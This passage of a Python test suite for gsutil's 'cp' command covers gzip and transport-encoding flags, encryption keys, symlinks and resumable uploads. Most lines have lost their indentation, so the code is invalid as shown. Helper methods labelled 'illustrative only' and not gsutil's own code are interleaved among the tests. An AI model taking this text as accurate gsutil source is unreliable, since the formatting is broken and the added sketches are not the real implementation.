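    with open(logpath, 'r') as fp:
      return list(csv.DictReader(fp))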
@SequentialAndParallelTransfer
def test_cp_manifest_download(self):
"""Tests downloading with a manifest file."""
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'')
logpath = self.CreateTempFile(contents=b'')
# Ensure the file is empty.
open(logpath, 'w').close()
self.RunGsUtil(
['cp', '-L', logpath, suri(key_uri), fpath], return_stdout=True)
with open(logpath, 'r') as f:
lines = f.readlines()
if six.PY3:
decode_lines = []
for line in lines:
if line.startswith("b'"):
some_strs = line.split(',')
line_parts = []
for some_str in some_strs:
if some_str.startswith("b'"):
line_parts.append(ast.literal_eval(some_str).decode(UTF8))
else:
line_parts.append(some_str)
decode_lines.append(','.join(line_parts))
else:
decode_lines.append(line)
lines = decode_lines
self.assertEqual(len(lines), 2)
expected_headers = [
'Source', 'Destination', 'Start', 'End', 'Md5', 'UploadId',
'Source Size', 'Bytes Transferred', 'Result', 'Description'
]
self.assertEqual(expected_headers, lines[0].strip().split(','))
results = lines[1].strip().split(',')
self.assertEqual(results[0][:5], '%s://' % self.default_provider) # source
self.assertEqual(results[1][:7], 'file://') # destination
date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
start_date = datetime.datetime.strptime(results[2], date_format)
end_date = datetime.datetime.strptime(results[3], date_format)
self.assertEqual(end_date > start_date, True)
self.assertEqual(int(results[6]), 3) # Source Size
# Bytes transferred might be more than 3 if the file was gzipped, since
# the minimum gzip header is 10 bytes.
self.assertGreaterEqual(int(results[7]), 3) # Bytes Transferred
self.assertEqual(results[8], 'OK') # Result
@SequentialAndParallelTransfer
def test_copy_unicode_non_ascii_filename(self):
key_uri = self.CreateObject()
# Try with and without resumable upload threshold, to ensure that each
# scenario works. In particular, resumable uploads have tracker filename
# logic.
file_contents = b'x' * START_CALLBACK_PER_BYTES * 2
fpath = self.CreateTempFile(file_name='Аудиоархив', contents=file_contents)
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', '1')]):
# fpath_bytes = fpath.encode(UTF8)
self.RunGsUtil(['cp', fpath, suri(key_uri)], return_stderr=True)
stdout = self.RunGsUtil(['cat', suri(key_uri)], return_stdout=True)
self.assertEquals(stdout.encode('ascii'), file_contents)
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold',
str(START_CALLBACK_PER_BYTES * 3))]):
self.RunGsUtil(['cp', fpath, suri(key_uri)], return_stderr=True)
stdout = self.RunGsUtil(['cat', suri(key_uri)], return_stdout=True)
self.assertEquals(stdout.encode('ascii'), file_contents)
  # Note: We originally implemented a test (test_copy_invalid_unicode_filename)
  # asserting that invalid unicode filenames were skipped, but it turns out
  # os.walk() on macOS has no problem with such files, so that test failed and
  # we removed it.
@SequentialAndParallelTransfer
def test_gzip_upload_and_download(self):
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
self.CreateTempFile(file_name='test.html', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.js', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.txt', tmpdir=tmpdir, contents=contents)
    # Test that specifying only 2 of the 3 file extensions gzips the correct
    # files, and that including whitespace in the extension list works.
self.RunGsUtil([
'cp', '-z', 'js, html',
os.path.join(tmpdir, 'test.*'),
suri(bucket_uri)
])
self.AssertNObjectsInBucket(bucket_uri, 3)
uri1 = suri(bucket_uri, 'test.html')
uri2 = suri(bucket_uri, 'test.js')
uri3 = suri(bucket_uri, 'test.txt')
stdout = self.RunGsUtil(['stat', uri1], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri2], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri3], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
fpath4 = self.CreateTempFile()
for uri in (uri1, uri2, uri3):
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
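  # The -z flag takes a comma-separated extension list that may contain
  # whitespace ('js, html' above); only files whose extension appears in the
  # list are stored with Content-Encoding: gzip. A minimal sketch of that
  # selection logic (illustrative only; not gsutil's actual implementation):
  def _should_gzip_for_extension_list(self, filename, extension_list):
    """Returns True if `filename` matches one of the -z/-j extensions."""
    extensions = set(ext.strip() for ext in extension_list.split(','))
    return os.path.splitext(filename)[1].lstrip('.') in extensions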
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_upload_and_download(self):
"""Test gzip encoded files upload correctly.
This checks that files are not tagged with a gzip content encoding and
that the contents of the files are uncompressed in GCS. This test uses the
-j flag to target specific extensions.
"""
def _create_test_data(): # pylint: disable=invalid-name
"""Setup the bucket and local data to test with.
Returns:
Triplet containing the following values:
bucket_uri: String URI of cloud storage bucket to upload mock data
to.
tmpdir: String, path of a temporary directory to write mock data to.
          local_uris: List of three strings; each is the file path to a file
containing mock data.
"""
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
local_uris = []
for filename in ('test.html', 'test.js', 'test.txt'):
local_uris.append(
self.CreateTempFile(file_name=filename,
tmpdir=tmpdir,
contents=contents))
return (bucket_uri, tmpdir, local_uris)
def _upload_test_data(tmpdir, bucket_uri): # pylint: disable=invalid-name
"""Upload local test data.
Args:
tmpdir: String, path of a temporary directory to write mock data to.
bucket_uri: String URI of cloud storage bucket to upload mock data to.
Returns:
stderr: String output from running the gsutil command to upload mock
data.
"""
stderr = self.RunGsUtil([
'-D', 'cp', '-j', 'js, html',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)
],
return_stderr=True)
self.AssertNObjectsInBucket(bucket_uri, 3)
return stderr
def _assert_sent_compressed(local_uris, stderr): # pylint: disable=invalid-name
"""Ensure the correct files were marked for compression.
Args:
        local_uris: List of three strings; each is the file path to a file
containing mock data.
stderr: String output from running the gsutil command to upload mock
data.
"""
local_uri_html, local_uri_js, local_uri_txt = local_uris
assert_base_string = 'Using compressed transport encoding for file://{}.'
self.assertIn(assert_base_string.format(local_uri_html), stderr)
self.assertIn(assert_base_string.format(local_uri_js), stderr)
self.assertNotIn(assert_base_string.format(local_uri_txt), stderr)
def _assert_stored_uncompressed(bucket_uri, contents=b'x' * 10000): # pylint: disable=invalid-name
"""Ensure the files are not compressed when they are stored in the bucket.
Args:
bucket_uri: String with URI for bucket containing uploaded test data.
        contents: Byte string stored in each file in the bucket.
"""
local_uri_html = suri(bucket_uri, 'test.html')
local_uri_js = suri(bucket_uri, 'test.js')
local_uri_txt = suri(bucket_uri, 'test.txt')
fpath4 = self.CreateTempFile()
for uri in (local_uri_html, local_uri_js, local_uri_txt):
stdout = self.RunGsUtil(['stat', uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
# Get mock data, run tests
bucket_uri, tmpdir, local_uris = _create_test_data()
stderr = _upload_test_data(tmpdir, bucket_uri)
_assert_sent_compressed(local_uris, stderr)
_assert_stored_uncompressed(bucket_uri)
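  # The key contrast with the -z/-Z tests above: -z/-Z store the object
  # gzip-compressed and tagged with Content-Encoding: gzip, whereas -j/-J only
  # compress the bytes in transit, so `stat` must *not* report that header and
  # a plain download returns the original contents. A tiny sketch of the
  # corresponding assertion (illustrative helper, not used by the tests):
  def _assert_content_encoding_for_mode(self, stat_output, stored_gzipped):
    """Asserts the Content-Encoding expectation for -z/-Z versus -j/-J."""
    if stored_gzipped:
      self.assertRegex(stat_output, r'Content-Encoding:\s+gzip')
    else:
      self.assertNotRegex(stat_output, r'Content-Encoding:\s+gzip')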
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_parallel_upload_non_resumable(self):
"""Test non resumable, gzip encoded files upload correctly in parallel.
This test generates a small amount of data (e.g. 100 chars) to upload.
Due to the small size, it will be below the resumable threshold,
and test the behavior of non-resumable uploads.
"""
    # Set up the bucket and local data.
bucket_uri = self.CreateBucket()
contents = b'x' * 100
tmpdir = self.CreateTempDir(test_files=10, contents=contents)
# Upload the data.
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB))
]):
stderr = self.RunGsUtil(
['-D', '-m', 'cp', '-J', '-r', tmpdir,
suri(bucket_uri)],
return_stderr=True)
# Ensure all objects are uploaded.
self.AssertNObjectsInBucket(bucket_uri, 10)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_parallel_upload_resumable(self):
"""Test resumable, gzip encoded files upload correctly in parallel.
This test generates a large amount of data (e.g. halt_size amount of chars)
to upload. Due to the large size, it will be above the resumable threshold,
and test the behavior of resumable uploads.
"""
    # Set up the bucket and local data.
bucket_uri = self.CreateBucket()
contents = get_random_ascii_chars(size=self.halt_size)
tmpdir = self.CreateTempDir(test_files=10, contents=contents)
# Upload the data.
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB))
]):
stderr = self.RunGsUtil(
['-D', '-m', 'cp', '-J', '-r', tmpdir,
suri(bucket_uri)],
return_stderr=True)
# Ensure all objects are uploaded.
self.AssertNObjectsInBucket(bucket_uri, 10)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
@SequentialAndParallelTransfer
def test_gzip_all_upload_and_download(self):
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
self.CreateTempFile(file_name='test.html', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.js', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.txt', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test', tmpdir=tmpdir, contents=contents)
# Test that all files are compressed.
self.RunGsUtil(
['cp', '-Z',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)])
self.AssertNObjectsInBucket(bucket_uri, 4)
uri1 = suri(bucket_uri, 'test.html')
uri2 = suri(bucket_uri, 'test.js')
uri3 = suri(bucket_uri, 'test.txt')
uri4 = suri(bucket_uri, 'test')
stdout = self.RunGsUtil(['stat', uri1], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri2], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri3], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri4], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
fpath4 = self.CreateTempFile()
for uri in (uri1, uri2, uri3, uri4):
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_all_upload_and_download(self):
"""Test gzip encoded files upload correctly.
This checks that files are not tagged with a gzip content encoding and
that the contents of the files are uncompressed in GCS. This test uses the
-J flag to target all files.
"""
    # Set up the bucket and local data.
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
local_uri1 = self.CreateTempFile(file_name='test.txt',
tmpdir=tmpdir,
contents=contents)
local_uri2 = self.CreateTempFile(file_name='test',
tmpdir=tmpdir,
contents=contents)
# Upload the data.
stderr = self.RunGsUtil(
['-D', 'cp', '-J',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)],
return_stderr=True)
self.AssertNObjectsInBucket(bucket_uri, 2)
# Ensure the correct files were marked for compression.
self.assertIn(
'Using compressed transport encoding for file://%s.' % (local_uri1),
stderr)
self.assertIn(
'Using compressed transport encoding for file://%s.' % (local_uri2),
stderr)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
# Ensure the files do not have a stored encoding of gzip and are stored
# uncompressed.
remote_uri1 = suri(bucket_uri, 'test.txt')
remote_uri2 = suri(bucket_uri, 'test')
fpath4 = self.CreateTempFile()
for uri in (remote_uri1, remote_uri2):
stdout = self.RunGsUtil(['stat', uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
def test_both_gzip_options_error(self):
"""Test that mixing compression flags error."""
cases = (
# Test with -Z and -z
['cp', '-Z', '-z', 'html, js', 'a.js', 'b.js'],
# Same test, but with arguments in the opposite order.
['cp', '-z', 'html, js', '-Z', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -z and -Z options together is invalid.', stderr)
def test_both_gzip_transport_encoding_options_error(self):
"""Test that mixing transport encoding flags error."""
cases = (
# Test with -J and -j
['cp', '-J', '-j', 'html, js', 'a.js', 'b.js'],
# Same test, but with arguments in the opposite order.
['cp', '-j', 'html, js', '-J', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -j and -J options together is invalid.', stderr)
def test_combined_gzip_options_error(self):
"""Test that mixing transport encoding and compression flags error."""
cases = (['cp', '-Z', '-j', 'html, js', 'a.js',
'b.js'], ['cp', '-J', '-z', 'html, js', 'a.js',
'b.js'], ['cp', '-j', 'html, js', '-Z', 'a.js', 'b.js'],
['cp', '-z', 'html, js', '-J', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -j/-J and -z/-Z options together is invalid.',
stderr)
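  # The three option-conflict tests above assert that the storage-compression
  # flags (-z/-Z) and the transport-encoding flags (-j/-J) are rejected in any
  # combination. A generic sketch of such a mutual-exclusion check
  # (illustrative only; this is not gsutil's actual argument handling):
  def _check_mutually_exclusive_flags(self, chosen_flags, group_a, group_b):
    """Raises ValueError if flags from both groups were supplied."""
    if chosen_flags & group_a and chosen_flags & group_b:
      raise ValueError('Specifying both %s and %s options together is '
                       'invalid.' % (sorted(group_a), sorted(group_b)))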
def test_upload_with_subdir_and_unexpanded_wildcard(self):
fpath1 = self.CreateTempFile(file_name=('tmp', 'x', 'y', 'z'))
bucket_uri = self.CreateBucket()
wildcard_uri = '%s*' % fpath1[:-5]
stderr = self.RunGsUtil(
['cp', '-R', wildcard_uri, suri(bucket_uri)], return_stderr=True)
self.assertIn('Copying file:', stderr)
self.AssertNObjectsInBucket(bucket_uri, 1)
@SequentialAndParallelTransfer
def test_cp_object_ending_with_slash(self):
"""Tests that cp works with object names ending with slash."""
tmpdir = self.CreateTempDir()
bucket_uri = self.CreateBucket()
self.CreateObject(bucket_uri=bucket_uri,
object_name='abc/',
contents=b'dir')
self.CreateObject(bucket_uri=bucket_uri,
object_name='abc/def',
contents=b'def')
self.AssertNObjectsInBucket(bucket_uri, 2)
self.RunGsUtil(['cp', '-R', suri(bucket_uri), tmpdir])
# Check that files in the subdir got copied even though subdir object
# download was skipped.
with open(os.path.join(tmpdir, bucket_uri.bucket_name, 'abc', 'def')) as f:
self.assertEquals('def', '\n'.join(f.readlines()))
def test_cp_without_read_access(self):
"""Tests that cp fails without read access to the object."""
# TODO: With 401's triggering retries in apitools, this test will take
# a long time. Ideally, make apitools accept a num_retries config for this
# until we stop retrying the 401's.
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
# Use @Retry as hedge against bucket listing eventual consistency.
self.AssertNObjectsInBucket(bucket_uri, 1)
if self.default_provider == 's3':
expected_error_regex = r'AccessDenied'
else:
expected_error_regex = r'Anonymous \S+ do(es)? not have'
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(['cp', suri(object_uri), 'foo'],
return_stderr=True,
expected_status=1)
self.assertRegex(stderr, expected_error_regex)
@unittest.skipIf(IS_WINDOWS, 'os.symlink() is not available on Windows.')
def test_cp_minus_r_minus_e(self):
"""Tests that cp -e -r ignores symlinks when recursing."""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
# Create a valid file, since cp expects to copy at least one source URL
# successfully.
self.CreateTempFile(tmpdir=tmpdir, contents=b'foo')
subdir = os.path.join(tmpdir, 'subdir')
os.mkdir(subdir)
os.mkdir(os.path.join(tmpdir, 'missing'))
    # Create a symlink to a directory and then remove the directory so that
    # the symlink is broken; recursive enumeration should not fail on it.
os.symlink(os.path.join(tmpdir, 'missing'), os.path.join(subdir, 'missing'))
os.rmdir(os.path.join(tmpdir, 'missing'))
self.RunGsUtil(['cp', '-r', '-e', tmpdir, suri(bucket_uri)])
@unittest.skipIf(IS_WINDOWS, 'os.symlink() is not available on Windows.')
def test_cp_minus_e(self):
fpath_dir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=fpath_dir)
fpath2 = os.path.join(fpath_dir, 'cp_minus_e')
bucket_uri = self.CreateBucket()
os.symlink(fpath1, fpath2)
# We also use -c to continue on errors. One of the expanded glob entries
# should be the symlinked file, which should throw a CommandException since
# no valid (non-symlinked) files could be found at that path; we don't want
# the command to terminate if that's the first file we attempt to copy.
stderr = self.RunGsUtil([
'cp', '-e', '-c',
'%s%s*' % (fpath_dir, os.path.sep),
suri(bucket_uri, 'files')
],
return_stderr=True)
self.assertIn('Copying file', stderr)
self.assertIn('Skipping symbolic link', stderr)
# Ensure that top-level arguments are ignored if they are symlinks. The file
# at fpath1 should be successfully copied, then copying the symlink at
# fpath2 should fail.
stderr = self.RunGsUtil(
['cp', '-e', '-r', fpath1, fpath2,
suri(bucket_uri, 'files')],
return_stderr=True,
expected_status=1)
self.assertIn('Copying file', stderr)
self.assertIn('Skipping symbolic link', stderr)
self.assertIn('CommandException: No URLs matched: %s' % fpath2, stderr)
def test_cp_multithreaded_wildcard(self):
"""Tests that cp -m works with a wildcard."""
num_test_files = 5
tmp_dir = self.CreateTempDir(test_files=num_test_files)
bucket_uri = self.CreateBucket()
wildcard_uri = '%s%s*' % (tmp_dir, os.sep)
self.RunGsUtil(['-m', 'cp', wildcard_uri, suri(bucket_uri)])
self.AssertNObjectsInBucket(bucket_uri, num_test_files)
@SequentialAndParallelTransfer
def test_cp_duplicate_source_args(self):
"""Tests that cp -m works when a source argument is provided twice."""
object_contents = b'edge'
object_uri = self.CreateObject(object_name='foo', contents=object_contents)
tmp_dir = self.CreateTempDir()
self.RunGsUtil(['-m', 'cp', suri(object_uri), suri(object_uri), tmp_dir])
with open(os.path.join(tmp_dir, 'foo'), 'rb') as in_fp:
contents = in_fp.read()
    # Contents should not be duplicated.
self.assertEqual(contents, object_contents)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_download_encrypted_object(self):
"""Tests downloading an encrypted object."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
object_contents = b'bar'
object_uri = self.CreateObject(object_name='foo',
contents=object_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
boto_config_for_test = [('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(object_uri), suri(fpath)])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), object_contents)
# If multiple keys are supplied and one is correct, download should succeed.
fpath2 = self.CreateTempFile()
boto_config_for_test2 = [
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY3),
('GSUtil', 'decryption_key1', TEST_ENCRYPTION_KEY2),
('GSUtil', 'decryption_key2', TEST_ENCRYPTION_KEY1)
]
with SetBotoConfigForTest(boto_config_for_test2):
self.RunGsUtil(['cp', suri(object_uri), suri(fpath2)])
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), object_contents)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_download_encrypted_object_without_key(self):
"""Tests downloading an encrypted object without the necessary key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
object_contents = b'bar'
object_uri = self.CreateObject(object_name='foo',
contents=object_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)],
expected_status=1,
return_stderr=True)
self.assertIn(
'Missing decryption key with SHA256 hash %s' %
TEST_ENCRYPTION_KEY1_SHA256_B64, stderr)
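  # The error above identifies the missing customer-supplied key by the
  # base64-encoded SHA256 of the raw key bytes, which is how CSEK hashes are
  # surfaced. A stdlib sketch of deriving that hash (illustrative helper, not
  # used by the tests; assumes the key constant holds the base64-encoded raw
  # key):
  def _csek_sha256_b64(self, key_b64):
    """Returns the base64 SHA256 hash string for a base64-encoded CSEK."""
    import hashlib  # local import keeps the sketch self-contained
    raw_key = base64.b64decode(key_b64)
    return base64.b64encode(hashlib.sha256(raw_key).digest()).decode('ascii')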
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_upload_encrypted_object(self):
"""Tests uploading an encrypted object."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri = suri(bucket_uri, 'foo')
file_contents = b'bar'
fpath = self.CreateTempFile(contents=file_contents, file_name='foo')
boto_config_for_test = [('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
# Uploading the object should succeed.
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(fpath), suri(bucket_uri)])
self.AssertObjectUsesCSEK(object_uri, TEST_ENCRYPTION_KEY1)
with SetBotoConfigForTest(boto_config_for_test):
# Reading the object back should succeed.
fpath2 = self.CreateTempFile()
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), suri(fpath2)])
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), file_contents)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_break(self):
"""Tests that an encrypted upload resumes after a connection break."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertIn('Resuming upload', stderr)
stdout = self.RunGsUtil(['stat', object_uri_str], return_stdout=True)
with open(fpath, 'rb') as fp:
self.assertIn(CalculateB64EncodedMd5FromContents(fp), stdout)
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY1)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_different_key(self):
"""Tests that an encrypted upload resume uses original encryption key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
file_contents = b'a' * self.halt_size
fpath = self.CreateTempFile(contents=file_contents)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
# Resume the upload with multiple keys, including the original.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'decryption_key1',
TEST_ENCRYPTION_KEY2),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test2):
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertIn('Resuming upload', stderr)
# Object should have the original key.
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY1)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_missing_key(self):
"""Tests that an encrypted upload does not resume without original key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
file_contents = b'a' * self.halt_size
fpath = self.CreateTempFile(contents=file_contents)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
# Resume the upload without the original key.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test2):
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertNotIn('Resuming upload', stderr)
self.assertIn('does not match current encryption key', stderr)
self.assertIn('Restarting upload from scratch', stderr)
# Object should have the new key.
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY2)
def _ensure_object_unencrypted(self, object_uri_str):
"""Strongly consistent check that the object is unencrypted."""
stdout = self.RunGsUtil(['stat', object_uri_str], return_stdout=True)
self.assertNotIn('Encryption Key', stdout)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break(self):
"""Tests that an upload can be resumed after a connection break."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
self.assertIn('Resuming upload', stderr)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_cp_resumable_upload_gzip_encoded_break(self):
"""Tests that a gzip encoded upload can be resumed."""
    # Set up the bucket and local data. File contents are randomized to prevent
# them from compressing below the resumable-threshold and failing the test.
bucket_uri = self.CreateBucket()
contents = get_random_ascii_chars(size=self.halt_size)
local_uri = self.CreateTempFile(file_name='test.txt', contents=contents)
# Configure boto
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'-D', 'cp', '-J', '--testcallbackfile', test_callback_file, local_uri,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['-D', 'cp', '-J', local_uri,
suri(bucket_uri)],
return_stderr=True)
self.assertIn('Resuming upload', stderr)
# Ensure the progress logger is still seeing a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
# Ensure the files do not have a stored encoding of gzip and are stored
# uncompressed.
temp_uri = self.CreateTempFile()
remote_uri = suri(bucket_uri, 'test.txt')
stdout = self.RunGsUtil(['stat', remote_uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', remote_uri, suri(temp_uri)])
with open(temp_uri, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_retry(self):
"""Tests that a resumable upload completes with one retry."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
# TODO: Raising an httplib or socket error blocks bucket teardown
# in JSON for 60-120s on a multiprocessing lock acquire. Figure out why;
# until then, raise an apitools retryable exception.
if self.test_api == ApiSelector.XML:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(5, http_client.BadStatusLine, (
'unused',))))
else:
